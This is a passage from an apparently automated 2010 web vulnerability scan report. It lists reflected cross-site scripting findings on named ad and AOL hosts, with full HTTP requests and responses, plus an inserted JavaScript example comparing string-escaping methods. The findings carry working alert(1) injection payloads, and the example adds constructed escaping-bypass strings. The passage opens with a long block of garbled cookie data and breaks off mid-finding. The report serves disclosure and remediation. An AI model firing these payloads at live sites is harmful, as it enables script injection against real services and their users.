#^3*!%b`:~~~~~<b*Vq~~!#8>S!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>U!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>Y!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#Mli!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b,s)!!!#G!#Mlj!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b.G.!!!#G!#Mlk!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b1F8!!!#G!#Mll!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b7DM!!!#G!!qW]!-I0R!$Khv!,m=A!$u!,!'`,R!?5%!#<DN(![:Z-!%l4g!%p5>~~~~~~<b*d^<c)Jw!!!([!!3L[!-I0R!$N)n!(45o!$tyM!(-EV!?5%!#<DN(!ZmB)!%oLn!%f(C~~~~~~<b*d`<jQ8t!!!([!#7km!-I0R!#6`[!.dFU!%$3p!)kPg!?5%!#W`W)!wVd.!$7>N!#SxE!'!?q~~~~~<b*yp<bCrk!!!#G!#]L>!+*L?!!bb>!/'PK!%*AE!$xxB!?5%!#W`W)!x$$2!%O'B!%pB(!')`p~~~~~<b+)<~~!#]LA!+*L?!!bb>!/'PK!%*AE!$xxB!?5%!#W`W)!x$$2!%O'B!%pB(!')`p~~~~~<b+)<~M.jTN!#]LC!+*L?!!bb>!/'PK!%*AE!$xxB!?5%!#W`W)!x$$2!%O'B!%pB(!')`p~~~~~<b+)<~M.jTN!#bv(!+*L?!!bb>!/'PK!%*AE!$xxB!?5%!#W`W)!x$$2!%O'B!%pB(!')`p~~~~~<b+)<~M.jTN!#P98!+*L?!!bb>!,g_7!$Y5L!%lRJ!?5%!#W`W)!x$$2!%O'B!%NTC!%NT+~~~~~<b+6'~M.jTN!#P9D!+*L?!!bb>!,g_7!$Y5L!%lRJ!?5%!#W`W)!x$$2!%O'B!%NTC!%NT+~~~~~<b+6'~M.jTN!#U]o!+*L?!!bb>!,g_7!$Y5L!%lRJ!?5%!#W`W)!x$$2!%O'B!%NTC!%NT+~~~~~<b+6'~~!#V=D!+*L?!!bb>!,g_7!$Y5L!%lRJ!?5%!#W`W)!x$$2!%O'B!%NTC!%NT+~~~~~<b+6'~!'5e-!#/e8!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!:ru!#/e<!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#/e@!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#/eD!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#/eN!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#/eR!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#2G4!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#C(W!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!
$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#E8B!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#Mlh!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<b+sC!!!#G!#Mlm!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bP=H!!!#G!#Mln!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<c*.>!!!#G!#V<O!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#WQo!-I0R!#B5*!.`:h!%!tJ!+,Cq!!vZ,#t#a+!w1K*!$cTX!$b[!!%xl+~~~~~<b+H#<bD@v!!!#G!#UL.!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~!!.vL!#UL/!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~M.jTN!#UL0!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~M.jTN!#UL>!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~!!xa=!#UOB!+*L?!!bb>!-Go'!$f>j!(R^Z!?5%!#t#a*!x$$2!%O'B!%>Uf!%_cG~~~~~<b+[0~!!xa="; bh="b!!!$q!!!?H!!!!$<b*d_!!#s8!!!!$<b)ff!!-C)!!!!#<apD8!!..X!!!!#<apWV!!/9n!!!!'<b*d_!!/Ju!!!!(<b*d_!!/Jw!!!!(<b*d_!!0+@!!!!#<apWF!!04a!!!!#<apWx!!06^!!!!#<apNi!!06m!!!!#<apNi!!06q!!!!#<apNi!!06t!!!!#<apNi!!07P!!!!#<apNi!!07a!!!!#<apNi!!07l!!!!#<apNi!!08B!!!!#<apNi!!08H!!!!#<apNi!!08d!!!!#<apNi!!08i!!!!#<apNi!!08m!!!!#<apNi!!2R$!!!!#<apF5!!346!!!!#<apG(!!3DH!!!!#<apNi!!3E>!!!!#<apNi!!4F0!!!!(<b*d_!!4d6!!!!#<ap?r!!:*A!!!!#<apD<!!<%4!!!!#<apD8!!<%5!!!!#<apD8!!<@s!!!!#<apD8!!VQ+!!!!#<apEG!!Zwa!!!!$<b)3q!!bu:!!!!G<b,`:!!ita!!!!(<b*d_!!jD(!!!!G<b,`:!!jD*!!!!G<b,`:!!jD>!!!!G<b,`:!!mEw!!!!G<b,`:!!qJw!!!!G<b,`:!!tGm!!!!#<b,g7!!ti>!!!!#<apF$!!tw.!!!!G<b,`:!!tw:!!!!G<b,`:!!u)F!!!!G<b,`:!!uZR!!!!.<b,`:!!u^D!!!!#<aqDt!!vOD!!!!%<b)ff!!vOF!!!!%<b)ff!!vq<!!!!#<apNi!!w/#!!!!#<apNi!!w/I!!!!#<apNi!!w/R!!!!#<apNi!!we_!!!!G<b,`:!!y>@!!!!G<b,`:!!yaE!!!!G<b,`:!#!ID!!!!G<b,`:!#!NM!!!!#<b,g7!#!vK!!!!#<b,g7!#'7A!!!!G<b,`:!#*bg!!!!#<b,g!!#.dO!!!!G<b,`:!#/j5!!!!#<b,g$!#/j:!!!!#<b,g$!#/j>!!!!#<b,g$!#1%d!!!!$<b)3q!#1bq!!!!.<b,`:!#2RT!!!!#<b,g!!#2Y*!!!!#<b,g!!#3*A!!!!G<b,`:!#34G!!!!G<b,`:!#3H!!!!!G<b,`:!#3L3!!!!#<b,g!!#5
+B!!!!#<b,g$!#6c%!!!!G<b,`:!#7rS!!!!#<b*yp!#8-G!!!!%<b)ff!#8-H!!!!%<b)ff!#8-I!!!!%<b)ff!#8-J!!!!%<b)ff!#8-K!!!!%<b)ff!#84U!!!!#<aqDs!#9ny!!!!#<apD,!#9qA!!!!G<b,`:!#9rw!!!!G<b,`:!#:<w!!!!#<b,g!!#@wb!!!!#<b,g$!#D%d!!!!#<b,g!!#EQ9!!!!#<b,g$!#F..!!!!#<b,g7!#GsG!!!!G<b,`:!#JqU!!!!#<b,g7!#Js*!!!!G<b,`:!#Kxq!!!!#<b,g$!#MTC!!!!(<b*d_!#MTF!!!!%<b)ff!#MTH!!!!(<b*d_!#MTI!!!!(<b*d_!#MTJ!!!!(<b*d_!#Ms5!!!!#<b,g!!#Mts!!!!#<b,g!!#N15!!!!#<b,g$!#N4R!!!!#<apS,!#O29!!!!$<b)3q!#O4F!!!!#<b,g$!#OH-!!!!#<b,g$!#P)=!!!!#<b,g$!#P>4!!!!G<b,`:!#Q*6!!!!G<b,`:!#Q+*!!!!#<b+ym!#Q+/!!!!G<b,`:!#Q+<!!!!%<b,Vh!#Q+I!!!!$<b+L9!#Q+^!!!!G<b,`:!#Q+o!!!!.<b,`:!#Q+p!!!!G<b,`:!#Q,.!!!!0<b+6$!#Q-%!!!!G<b,`:!#Q-7!!!!G<b,`:!#Q-A!!!!G<b,`:!#Q-d!!!!G<b,`:!#Q.@!!!!G<b,`:!#QMh!!!!%<b)ff!#R%b!!!!$<b)3q!#R%c!!!!$<b)3q!#RY.!!!!G<b,`:!#R]*!!!!#<b,g7!#Ri/!!!!G<b,`:!#Rij!!!!G<b,`:!#SCj!!!!+<b,`<!#SCk!!!!%<b*fi!#SFH!!!!%<b)ff!#SFJ!!!!%<b)ff!#SFM!!!!%<b)ff!#Snj!!!!#<b,g7!#Su2!!!!%<b)ff!#Su3!!!!%<b)ff!#Su4!!!!%<b)ff!#Tnr!!!!#<b,g!!#Tun!!!!#<b,g7!#Tuq!!!!#<b,g7!#UJ4!!!!#<b,g$!#UJ>!!!!#<b,g$!#UUc!!!!#<b,g$!#UUf!!!!#<b,g!!#UY_!!!!$<b)3q!#UYf!!!!$<b)3q!#UYg!!!!$<b)3q!#UYl!!!!$<b)3q!#UYn!!!!$<b)3q!#UZ(!!!!$<b)3q!#UZ)!!!!$<b)3q!#V6S!!!!#<b,g!!#V9d!!!!#<b,g$!#VG`!!!!#<b,g!!#VMs!!!!$<b)3q!#VMw!!!!$<b)3q!#VMx!!!!$<b)3q!#VN!!!!!$<b)3q!#VN#!!!!$<b)3q!#VN$!!!!$<b)3q!#VN%!!!!$<b)3q!#VN'!!!!$<b)3q!#VN(!!!!$<b)3q!#VN-!!!!$<b)3q!#VN.!!!!$<b)3q!#VN/!!!!$<b)3q!#VN1!!!!$<b)3q!#VN2!!!!$<b)3q!#W`,!!!!#<apY3!#Wa9!!!!#<b,g!!#Wa=!!!!#<b,g!!#XA!!!!!G<b,`:!#X]+!!!!G<b,`:!#X]l!!!!G<b,`:!#X^1!!!!#<b,g$!#Xa9!!!!%<b)ff!#Xa:!!!!%<b)ff!#XaK!!!!G<b,`:!#ZAw!!!!#<apWb!#ZBw!!!!G<b,`:!#Z]J!!!!#<b)6%!#Zj[!!!!$<b)3q!#Zj]!!!!$<b)3q!#Zj^!!!!$<b)3q!#Zj_!!!!$<b)3q!#Zj`!!!!$<b)3q!#Zjb!!!!$<b)3q!#Zjc!!!!$<b)3q!#Zmf!!!!)<b,dJ!#Znh!!!!#<b,g$!#[5H!!!!#<b,g7!#[7l!!!!G<b,`:!#[sS!!!!G<b,`:!#],2!!!!'<b*d_!#],3!!!!'<b*d_!#],4!!!!'<b*d_!#],5!!!!'<b*d_!#],6!!!!'<b*d_!#],7!!!!'<b*d_!#],9!!!!'<b*d_!#],:!!!!'<b*d_!#],<!!!!'<b*d_!#],>!!!!'<b*d_!#],?!!!!'<b*d_!#],@!!!!'<b*d_!#],A!!!
!'<b*d_!#]BL!!!!'<b*d_!#]BM!!!!'<b*d_!#]NL!!!!#<b,g!!#]W%!!!!G<b,`:!#]Z!!!!!$<b)3q!#]wA!!!!#<ap?t!#]wJ!!!!$<b)ff!#]wW!!!!#<ap?t!#^#O!!!!#<b,g!!#^$-!!!!(<b*d_!#^Bo!!!!G<b,`:!#_.<!!!!$<b)3q!#_0t!!!!#<b#/T!#`-[!!!!(<b*d_!#`-d!!!!(<b*d_!#`-e!!!!(<b*d_!#`-f!!!!(<b*d_!#`-g!!!!(<b*d_!#`-i!!!!(<b*d_!#`-j!!!!(<b*d_!#a,x!!!!G<b,`:!#a3k!!!!G<b,`:!#a57!!!!G<b,`:!#aEJ!!!!$<b)3q!#aG>!!!!G<b,`:!#aGr!!!!%<b+H#!#a[w!!!!#<b*-O!#avB!!!!G<b,`:!#b//!!!!#<b,g!!#bn9!!!!$<b*-N!#c8V!!!!$<b)3q!#c8W!!!!$<b)3q!#c8X!!!!$<b)3q!#c8c!!!!$<b)3q!#c8g!!!!$<b)3q!#c8v!!!!$<b)3q!#c9A!!!!$<b)3q!#c9f!!!!$<b)3q!#dVK!!!!'<b*d_"; vuday1=wqsoi?:rWI%)0sMB3=NPNCsI8Wg:ss; lifb=+<wB+1@SpyAFC_u9NH!TE93w*@)6sfI>yV.1>!3aF8k'G09vv%EBG0rVatIsbI3A_; liday1=uSolsE8o@Km0+-/^Hxp2%P2k=/U(jkqt9@sNCsI875tOx; caday1=JN3XVNCsI8t((!!; cafb=L^JHM$5A(F^aB',#T`mD$o6r8

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 14:10:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 21 Nov 2010 14:10:13 GMT
Pragma: no-cache
Content-Length: 4349
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&anmember=316&anprice=30&c9071"-alert(1)-"47372ef7d14=1&s=1532283&_salt=2975334667";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

2.62. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of REST URL parameter 3 is copied, without encoding, into the message field of the JSON error body. The payload a29f1<script>alert(1)</script>8031e56c6a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept shows that the parameter is reflected verbatim. Note, however, that the response is served as Content-Type: application/json, so a browser that honours the declared type will not parse it as HTML; the reflection is exploitable as XSS only where some consumer renders the body as HTML, for example a client that inserts the error message into a page unescaped, or a browser that sniffs the content type. The error body also exposes a Java stack trace (class names, file names and line numbers), which the application need not reveal to callers.

Request

GET /adam-services/api/mediaa29f1<script>alert(1)</script>8031e56c6a9/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4481
Date: Fri, 19 Nov 2010 23:39:53 GMT

{"isOk":false,"callDuration":1,"result":{"className":"java.lang.IllegalArgumentException","message":"[/mediaa29f1<script>alert(1)</script>8031e56c6a9/getVideo] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.glo
...[SNIP]...

2.63. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of REST URL parameter 4 is copied, without encoding, into the message field of the JSON error body. The payload 13383<script>alert(1)</script>759d055aeaf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept shows that the parameter is reflected verbatim. As the response is served as application/json, it executes as script only where a consumer renders the body as HTML.

Request

GET /adam-services/api/media/getVideo13383<script>alert(1)</script>759d055aeaf?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4481
Date: Fri, 19 Nov 2010 23:39:55 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[/media/getVideo13383<script>alert(1)</script>759d055aeaf] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.global.util.
...[SNIP]...

2.64. http://adam-service.app.aol.com/adam-services/api/media/getVideo [brightcoveId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of the brightcoveId request parameter is copied, without encoding, into the message field of the JSON error body (the type-conversion error for a value that is not a long). The payload 60e4e<script>alert(1)</script>b30e3448c3 was submitted in the brightcoveId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept shows that the parameter is reflected verbatim. As the response is served as application/json, it executes as script only where a consumer renders the body as HTML.

Request


GET /adam-services/api/media/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId=60e4e<script>alert(1)</script>b30e3448c3 HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Date: Fri, 19 Nov 2010 23:39:34 GMT
Content-Length: 11064

{"isOk":false,"callDuration":1,"result":{"className":"java.lang.IllegalArgumentException","message":"Cannot convert [brightcoveId] parameter with values of [60e4e<script>alert(1)</script>b30e3448c3] to [long] type!","stackTrace":[{"className":"com.aol.global.util.WebPageContext","methodName":"getParameter","fileName":"WebPageContext.java","lineNumber":330},{"className":"com.aol.global.util.WebPa
...[SNIP]...

2.65. http://adam-service.app.aol.com/adam-services/api/media/getVideo [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of the version request parameter is copied, without encoding, into the message field of the JSON error body (the "not a valid version string" error). The payload 60918<script>alert(1)</script>c05f1131b8b was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept shows that the parameter is reflected verbatim. As the response is served as application/json, it executes as script only where a consumer renders the body as HTML.

Request

GET /adam-services/api/media/getVideo?version=1.060918<script>alert(1)</script>c05f1131b8b&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4710
Date: Fri, 19 Nov 2010 23:39:12 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[1.060918<script>alert(1)</script>c05f1131b8b] is not a valid version string!","stackTrace":[{"className":"com.aol.global.util.Version","methodName":"<init>
...[SNIP]...

2.66. http://ads.pointroll.com/PortalServe/ [dom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the dom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1061d"%3balert(1)//0b9bf39d227 was submitted in the dom parameter. This input was echoed as 1061d";alert(1)//0b9bf39d227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
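
Findings 2.57, 2.59, 2.60, 2.61 and 2.66 share one sink: a request value dropped into a quoted JavaScript string literal inside a script. The following is an added example, not code from the report or from any of the ad servers it lists, that renders that sink the way a server-side template would and compares three ways of escaping the value. `renderScript`, `quoteOnly`, `escapeForJsString`, the stand-in `alert` and the last two payloads are assumptions of this example; the first two payloads are copied from findings 2.61 and 2.57. It goes one step beyond the findings by also checking the `</script>` boundary, which the JavaScript engine never sees but the HTML tokenizer does.

```javascript
// Added example (not from the scanner report or the ad servers it lists):
// the var rm_url = "<value>"; sink from the findings, rendered with three
// escaping strategies and exercised with a stand-in alert() to see which
// strategy actually keeps the value inside the string literal.

// No escaping: what the vulnerable responses do.
const identity = (s) => s;

// A common half-fix: backslash the double quote only. (Assumed.)
const quoteOnly = (s) => s.replace(/"/g, '\\"');

// Correct for a JS string literal in an inline <script>: every character
// outside a small allow-list becomes a \xHH or \uHHHH escape, so quotes,
// backslashes, '<' (which could otherwise form "</script>") and line
// terminators (U+2028/U+2029 included) are all inert.
function escapeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ,._-]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Render the template as a server-side page would.
function renderScript(value, escape) {
  return 'var rm_url = "' + escape(value) + '";';
}

// Run the rendered script with a stand-in alert() that records whether it ran.
// new Function keeps this dependency-free; the return goes on its own line so
// a payload ending in // cannot comment it out.
function runScript(script) {
  let alertFired = false;
  const fakeAlert = () => { alertFired = true; return 0; };
  try {
    const rm_url = new Function('alert', script + '\nreturn rm_url;')(fakeAlert);
    return { alertFired, rm_url, error: null };
  } catch (e) {
    return { alertFired, rm_url: undefined, error: e.name };
  }
}

// The HTML tokenizer ends a <script> element at the first "</script" no matter
// where JS string boundaries lie, so that has to be checked at the text level.
function scriptElementIntact(script) {
  return !/<\/script/i.test(script);
}

// One verdict per (value, escaper): did code run, did the value survive
// unchanged, and does the script element still end where the template put it?
function assess(value, escape) {
  const script = renderScript(value, escape);
  const run = runScript(script);
  return {
    alertFired: run.alertFired,
    roundTrips: run.rm_url === value,
    scriptIntact: scriptElementIntact(script),
    error: run.error,
  };
}

// Two payloads from findings 2.61 and 2.57, plus two constructed ones.
const PAYLOADS = [
  'c9071"-alert(1)-"47372ef7d14',
  '26807";alert(1)//ce3e2d56175',
  'x\\";alert(1)//',                     // constructed: defeats quote-only escaping
  '</script><script>alert(1)</script>',  // constructed: defeats anything that leaves '<' alone
];
const ESCAPERS = { identity, quoteOnly, escapeForJsString };

// One row per (payload, escaper), for inspection or assertion.
function report() {
  const rows = [];
  for (const value of PAYLOADS) {
    for (const [name, escape] of Object.entries(ESCAPERS)) {
      rows.push({ escaper: name, value, ...assess(value, escape) });
    }
  }
  return rows;
}

console.table(report());
```

The table makes the point of the remediation text concrete: unescaped, both report payloads run; the quote-only fix stops them but is itself bypassed by a value ending in a backslash, and it does nothing about `</script>`; only the hex-escaping form keeps every value inside the literal and returns it unchanged. HTML entity encoding is not an alternative here, since entities are not decoded inside a script element, so `&quot;` would corrupt the value rather than neutralise it. Note also that `JSON.stringify` on its own leaves `<` alone, so a JSON-based embedding still needs `<` rewritten to `\u003c`.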

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=10&time=5|16:53|-6&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$&pos=x&dom=http://ad.yieldmanager.com1061d"%3balert(1)//0b9bf39d227&r=0.8183337452065122 HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
lw%252FA%253D5758430%252FR%253D0%252F%252A%2524,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$&dom=http://ad.yieldmanager.com1061d";alert(1)//0b9bf39d227&time=5|16:53|-6&r=0.8183337452065122&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.67. http://ads.pointroll.com/PortalServe/ [flash parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81d17"%3balert(1)//822354244e3 was submitted in the flash parameter. This input was echoed as 81d17";alert(1)//822354244e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

